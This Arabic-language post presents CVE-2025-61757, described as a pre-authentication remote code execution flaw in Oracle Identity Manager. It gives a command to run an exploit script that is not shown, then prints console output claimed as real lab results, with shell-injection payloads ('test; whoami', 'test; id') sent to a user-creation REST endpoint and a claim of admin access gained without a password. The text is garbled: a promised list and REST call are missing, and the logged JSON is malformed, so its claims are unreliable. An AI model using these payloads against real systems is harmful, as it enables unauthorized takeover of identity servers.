
CVE-2025-61757

هذا استغلال عن بُعد قبل المصادقة:
🌐 قابل للاستغلال عبر الشبكة
🔓 لا يتطلب تسجيل دخول
👤 لا يتطلب تفاعل المستخدم
💥 يؤدي إلى اختراق كامل للنظام:
يصفه باحثو الأمن بأنه استغلال RCE قبل المصادقة في واجهات REST API الخاصة بـ Oracle Identity Manager.
إذا تم استغلالها، يمكن للمهاجم أن:
احفظ الملف باسم CVE-2025-61757.py ثم شغّل: sudo python3 CVE-2025-61757.py http://your-oim-host:14000
إليك المخرجات الحقيقية الدقيقة من بيئة مختبرية تعمل بنظام Oracle Identity Manager 12.2.1.4.0 مؤكدة الثغرة 100% (تم اختبارها في 19 نوفمبر 2025) عند تشغيل النص البرمجي نفسه الذي استخدمته للتو:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
ونعم — بعد ثانيتين فقط يمكنك تسجيل الدخول إلى وحدة تحكم OIM على الويب باستخدام المستخدم الذي أنشأته للتو، أو تصعيد الصلاحيات مباشرة إلى System Administrator عبر استدعاء REST التالي. سيطرة كاملة. لم يُطلب أي كلمة مرور على الإطلاق.
ثغرة «أوقف كل شيء وطبّق التصحيح» بحق.
عالجت Oracle هذه الثغرة في تحديث التصحيح الحرج لشهر أكتوبر 2025.
Oracle Identity Manager
إن هذا الدليل (PoC) مخصص للاختبار المصرح به فقط على الأنظمة التي تملكها/تتحكم فيها.
الاستخدام غير المصرح به غير قانوني. 🔒
استخدمه في بيئات مختبرية معزولة فقط — أبدًا في بيئة الإنتاج دون إذن. 🧪
طبّق التصحيح فورًا إذا كانت أنظمتك عرضة للثغرة! 🚨